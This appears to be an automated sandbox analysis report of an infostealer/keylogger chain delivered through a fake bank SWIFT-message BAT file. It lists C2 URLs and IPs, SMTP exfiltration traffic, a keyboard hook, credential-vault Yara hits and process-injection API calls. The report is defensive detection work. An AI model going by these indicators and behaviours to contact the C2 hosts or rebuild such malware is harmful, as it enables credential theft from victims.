Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A05908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02A05908

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 030B7394h	14_2_030B7188
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 030B78DCh	14_2_030B7688
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_030B7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_030B7E56
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 4x nop then jmp 05E5BCBDh	19_2_05E5BA40

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://gxe0.com/yak/233_Wisrysxlfss

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A1E4B8 InternetCheckConnectionA,

4_2_02A1E4B8

Source: global traffic

TCP traffic: 192.168.2.8:49708 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 51.195.88.199 51.195.88.199

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 198.252.105.91:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49709
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49721

Source: global traffic

TCP traffic: 192.168.2.8:49708 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: gxe0.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz

Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, x.exe, 00000004.00000002.1534436929.0000000021DEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1506456469.0000000000686000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1534105002.0000000021BF0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.000000000287C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.000000000287E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020764000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1540551626.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1506872662.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1660368294.0000000002B12000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001B.00000000.1636599259.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001E.00000002.1742914385.0000000002B52000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/
Source: x.exe, 00000004.00000002.1526389874.00000000207ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: x.exe, 00000004.00000002.1526389874.0000000020803000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000207D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_WisrysxlfssV;
Source: x.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssb
Source: x.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfsst
Source: x.exe, 00000004.00000002.1509390491.0000000000631000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49718 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Code function: 28_2_0691C970 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0691D7F0,00000000,00000000

28_2_0691C970

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: server_BTC.exe.12.dr, opqcmgIPmeabY.cs	Long String: Length: 17605
Source: TrojanAIbot.exe.14.dr, opqcmgIPmeabY.cs	Long String: Length: 17605

Found large BAT file

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Static file information: 1057171

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A18670 NtUnmapViewOfSection,	4_2_02A18670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A18400 NtReadVirtualMemory,	4_2_02A18400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A17A2C NtAllocateVirtualMemory,	4_2_02A17A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02A1DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02A1DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A18D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02A18D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02A1DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A17D78 NtWriteVirtualMemory,	4_2_02A17D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A17A2A NtAllocateVirtualMemory,	4_2_02A17A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A1DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02A1DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A18D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02A18D6E
